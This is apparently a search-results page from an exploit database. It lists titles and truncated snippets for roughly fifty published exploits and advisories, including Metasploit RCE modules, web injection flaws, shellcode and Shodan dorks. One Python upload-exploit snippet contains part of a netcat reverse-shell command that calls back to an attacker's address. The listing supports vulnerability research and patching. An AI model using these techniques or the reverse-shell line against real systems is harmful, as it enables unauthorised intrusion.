39001 matches found
VMware vCenter Server Analytics (CEIP) Service File Upload Exploit
This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry CEIP service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default. This module...
b374k 3.2.3 2.8 CSRF / Command Injection Vulnerabilities
b374k web shell versions 2.8 and 3.2.3 suffer from a cross site request forgery vulnerability that allows for remote command injection. Vendor: ============================================ github.com/b374k/b374k code.google.com/p/b374k-shell/downloads/list code.google.com/archive/p/b374k-shell/...
Oracle Weblogic PreAuth Remote Command Execution Exploit
Oracle Weblogic versions 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability. This Metasploit module exploits this vulnerability to trigger the JNDI...
pfBlockerNG 2.1.4_26 - Remote Code Execution Exploit
Exploit Title: pfBlockerNG 2.1.426 - Remote Code Execution RCE Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22 Date: 5th of September 2022 Exploit Author: IHTeam Vendor Homepage:...
WordPress Preview E-mails For WooCommerce 1.6.8 Cross Site Scripting Vulnerability
WordPress Preview E-mails for WooCommerce plugin versions 1.6.8 and below suffer from a cross site scripting vulnerability. Description: Reflected Cross-Site Scripting Affected Plugin: Preview E-mails for WooCommerce Plugin Slug: woo-preview-emails Affected Versions: = 1.6.8 CVE ID: CVE-2021-4236...
qdPM 9.1 Authenticated Shell Upload Exploit
A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users'photoppreview' delete photo feature thus allowing bypass of .htaccess...
BoltWire 4.10 Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Vulnerability in BoltWire, which can be exploited to execute arbitrary PHP code on the target system and gain complete control over vulnerable web application. 1 Unrestricted Upload of File with Dangerous Type in BoltWire: CVE-2014-4169 The...
MacOS CoreAudio Framework Sandbox Escape Exploit
MacOS suffers from a sandbox escape vulnerability due to a type confusion issue in coreaudiod/CoreAudio Framework. The com.apple.audio.audiohald Mach service on MacOS is hosted by the coreaudiod process. This process exposes the Hardware Abstraction Layer HAL of the CoreAudio framework, which...
OpenNetAdmin Ping Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OpenNetAdmin Ping Command Injection', 'Description' = %q This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1. ,...
Artica Proxy 4.50 Loopback Service Disclosure Vulnerability
Services that are running and bound to the loopback interface on the Artica Proxy version 4.50 are accessible through the proxy service. In particular, the tailon service is running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Using the tailon service,...
Zimbra Collaboration Suite TAR Path Traversal Exploit
This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility th...
Background Intelligent Transfer Service Privilege Escalation Exploit
This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the Background Intelligent Transfer Service BITS, to overwrite C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL containing the attacker's payload. To achieve code executio...
Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation Vulnerability
The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to...
Calavera UpLoader 3.5 - (FTP Logi) Denial of Service (PoC + SEH Overwrite) Exploit
Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service PoC + SEH Overwrite Author: Felipe Winsnes Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe Version: 3.5 Tested on: Windows 7 x86 Blog: https://whitecr0wz.github.io/ Sadly enough, this...
WebCTRL OEM 6.5 - (locale) Reflected Cross-Site Scripting Vulnerability
Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting XSS Exploit Author: 3ndG4me Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/ Version: 6.5 and Below CVE : CVE-2021-31682 --Summary-- The login portal for the Automated Logic...
TIBCO JasperReports Server 8.0.2 Community Edition Code Execution Vulnerability
Due to JMX/RMI services in TIBCO JasperReports Server version 8.0.2 Community Edition performing unsafe deserialization, it is possible to execute arbitrary code and system commands on the server system. Product: JasperReports Server Manufacturer: TIBCO Software Inc. Tested Versions: 8.0.2...
WordPress NextScripts: Social Networks Auto-Poster 4.3.20 XSS Vulnerability
WordPress NextScripts: Social Networks Auto-Poster plugin versions 4.3.20 and below suffer from a cross site scripting vulnerability. Description: Reflected Cross-Site ScriptingXSS Affected Plugin: NextScripts: Social Networks Auto-Poster Plugin Slug: social-networks-auto-poster-facebook-twitter-...
MikroTik RouterOS 6.x Reachable Assertion Failure / Null Pointer Dereference Vulnerabilities
MikroTik RouterOS version 6.x suffers from having multiple null pointer dereference vulnerabilities and a reachable assertion failure MikroTik RouterOS 6.x Reachable Assertion Failure / Null Pointer Dereference Details ======= Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor...
FreePBX < 13.0.188 - Remote Command Execution (Metasploit) Exploit
Exploit for php platform in category remote exploits Title : Freepbx =begin Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking Technical details...
Php travel agency system 1.0 by oretnom23 Multiple SQL injection Vulnerabilities
Title: travel-1.0-by-oretnom23 Multiple-SQLi Author: nu11secur1ty Vendor: https://github.com/oretnom23 Software: https://github.com/oretnom23/php-travel-agency-system Reference: https://portswigger.net/web-security/sql-injection Description: The search parameter appears to be vulnerable to SQL...
PMB 5.6 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: PMB 5.6 Cross Site Scripting XSS Google Dork: inurl:opaccss Exploit Author: 41-trk Tarik Bakir Email: tarikbak999atgmail.com Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files...
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit
// Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 85724947 = 00000000051c0f13 const XulsAutomationPrefIsSet = 0x051c0f13...
Apache CouchDB < 2.1.0 - Remote Code Execution Exploit
Exploit for linux platform in category web applications Title: Apache CouchDB 2.1.0 - Remote Code Execution Author: Cody Zacharias Shodan Dork: port:5984 Vendor Homepage: http://couchdb.apache.org/ Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ Version: = 1.7.0 and 2.x - 2.1....
PRTG Authenticated Remote Code Execution Exploit
class MetasploitModule 'PRTG CVE-2023-32781 Authenticated RCE', 'Description' = %q Authenticated RCE in Paessler PRTG , 'License' = MSFLICENSE, 'Author' = 'Kevin Joensen ', 'References' = 'URL', 'https://baldur.dk/blog/prtg-rce.html', 'CVE', '2023-32781' , 'DisclosureDate' = '2023-08-09',...
Apache OFBiz XML-RPC Java Deserialization Exploit
This Metasploit module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for versions prior to 17.12.04. This module requires Metasploit: https://metasploit.com/download Current source:...
FreeSWITCH 1.10.6 SIP Flooding Denial Of Service Exploit
FreeSWITCH susceptible to Denial of Service via SIP flooding - Fixed versions: v1.10.7 - Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-06-freeswitch-flood-dos - Vendor Security Advisory:...
Atlassian Confluence SSTI Injection Exploit
This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable. This module requires...
Sophos XG115w Firewall 17.0.10 MR-10 Authentication Bypass Vulnerability
Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass Exploit Author: Aryan Chehreghani Vendor Homepage: https://www.sophos.com Version: 17.0.10 MR-10 Tested on: Windows 11 CVE : CVE-2022-1040 VULNERABILITY DETAILS : This vulnerability allows an attacker to gain unauthorized...
TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference Vulnerability
Vulnerability title: TP-LINK Cloud Cameras NCXXX Remote NULL Pointer Dereference Author: Pietro Oliva CVE: CVE-2020-10231 Vendor: TP-LINK Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450 Affected version: NC200 = 2.1.8 build 171109, NC210 = 1.0.9 build 171214, NC220 = 1.3.0 build 180105,...
Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
210 bytes small WinExec add-admin dynamic null-free shellcode. // Shellcode Title: WinExec Add-Admin Dynamic Null-Free Shellcode 210 Bytes // Shellcode Author: Bobby Cooke // Date: March 21st, 2020 // Tested on: Windows 10 Home - 1909 x8664, Windows 10 Pro - 1909 x86 // Description: Windows...
Selenium Chrome Remote Code Execution Exploit
Selenium Server Grid versions prior to 4.0.0-alpha-7 allows cross site request forgery because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain and this issue in turn allows for an attacker to achieve remote code execution. This modu...
PKP-WAL 3.4.0-3 Remote Code Execution Exploit
PKP Web Application Library PKP-WAL versions 3.4.0-3 and below, as used in Open Journal Systems OJS, Open Monograph Press OMP, and Open Preprint Systems OPS before versions 3.4.0-4 or 3.3.0-16, suffer from a NativeImportExportPlugin related remote code execution vulnerability...
Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit
Exploit for unknown platform in category web applications =========================================================== Simple Machines Forum = 1.1 rc2 Lock Topics Remote Exploit =========================================================== !/usr/bin/php -q -d shortopentag=on ? printr'...
Pentaho Business Analytics / Pentaho Business Server 9.1 SQL Injection Vulnerability
Pentaho allows users to create and manage Data Sources. Users can select a Data Source when creating a Dashboard through the Pentaho User Console. When a Data Source is added, Pentaho makes a HTTP request to the dashboards editor /pentaho/api/repos/dashboards/editor in order to test the connectio...
Kentico CMS 12.0.14 Remote Command Execution Exploit
This Metasploit module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier. Remote command execution is possible via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML inp...
WordPress Elementor 3.6.2 Remote Code Execution Vulnerability
Description: Insufficient Access Control leading to Subscriber+ Remote Code Execution Affected Plugin: Elementor Plugin Slug: elementor Plugin Developer: Elementor Affected Versions: 3.6.0 – 3.6.2 CVE ID: CVE-2022-1329 CVSS Score: 9.9Critical CVSS Vector:...
FreeSWITCH 1.10.1 - Command Execution Exploit
Exploit Title: FreeSWITCH 1.10.1 - Command Execution Exploit Author: 1F98D Vendor Homepage: https://freeswitch.com/ Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi Version: 1.10.1 Tested on: Windows 10 x64 FreeSWITCH listens on port 8021 by...
CUPS Filter Bash Environment Variable Code Injection Exploit
This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTERINFO and PRINTERLOCATION variables by default. This module requires Metasploit: http://metasploit.com/download Current source:...
Craft CMS 4.4.14 Remote Code Execution Exploit
This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Craft CMS...
Online Student Clearance System 1.0 Shell Upload Exploit
!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...
Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange IKE packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP Firmware version 4.60 to 5.35 inclusive, USG FLEX...
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Exploit
Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Exploit Author: s1gh Vendor Homepage: https://grafana.com/ Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p Version: V8.0.0-beta1 through V8.3.0 Description: Grafana version...
GNU gdbserver 9.2 - Remote Command Execution Exploit
Exploit Title: GNU gdbserver 9.2 - Remote Command Execution RCE Exploit Author: Roberto Gesteira Miñarro 7Rocky Vendor Homepage: https://www.gnu.org/software/gdb/ Software Link: https://www.gnu.org/software/gdb/download/ Version: GNU gdbserver Ubuntu 9.2-0ubuntu120.04 9.2 Tested on: Ubuntu Linux...
Umbraco v8.14.1 - (baseUrl) SSRF Vulnerability
Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF Exploit Author: NgoAnhDuc Vendor Homepage: https://our.umbraco.com/ Software Link: https://our.umbraco.com/download/releases/8141 Version: v8.14.1 Affect: Umbraco CMS v8.14.1, Umbraco Cloud Vulnerable code:...
WBCE 1.6.0 - Unauthenticated SQL injection Vulnerability
Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 Exploit Author: young pope Vendor Homepage: https://github.com/WBCE/WBCECMS Software Link: https://github.com/WBCE/WBCECMS/archive/refs/tags/1.6.0.zip Version: 1.6.0 Tested on: Kali linux CVE : CVE-2023-39796 There is an sql injection...
Sophos VPN Web Panel 2020 - Denial of Service Exploit
Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service Poc Exploit Author: Berk KIRAS Vendor Homepage: https://www.sophos.com/ Version:2020 Web Panel Tested on: Apache Berk KIRAS PwC - Cyber Security Specialist Sophos VPN Web Portal Denial of Service Vulnerability System parse JSON data. If...
H2 Database Web Interface Create Alias Remote Code Execution Exploit
The H2 database contains an alias function which allows for arbitrary Java code to be used. This functionality can be abused to create an exec functionality to pull our payload down and execute it. H2's web interface contains restricts MANY characters, so injecting a payload directly is not...
Jetty 9.4.37.v20210219 - Information Disclosure Vulnerability
Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure Exploit Author: Mayank Deshmukh Vendor Homepage: https://www.eclipse.org/jetty/ Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/ Version: 9.4.37.v20210219 and 9.4.38.v20210224 Tested...
Hospital Patient Record Management System v1.0 Multiple SQL injection Vulnerability
Title: Hospital Patient Record Management System v1.0 Multiple SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Reference:...
WordPress Radio Player 2.0.82 Server-Side Request Forgery Vulnerability
CVE-2024-54385 Radio Player = 2.0.82 - Unauthenticated Server-Side Request Forgery Description The Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This...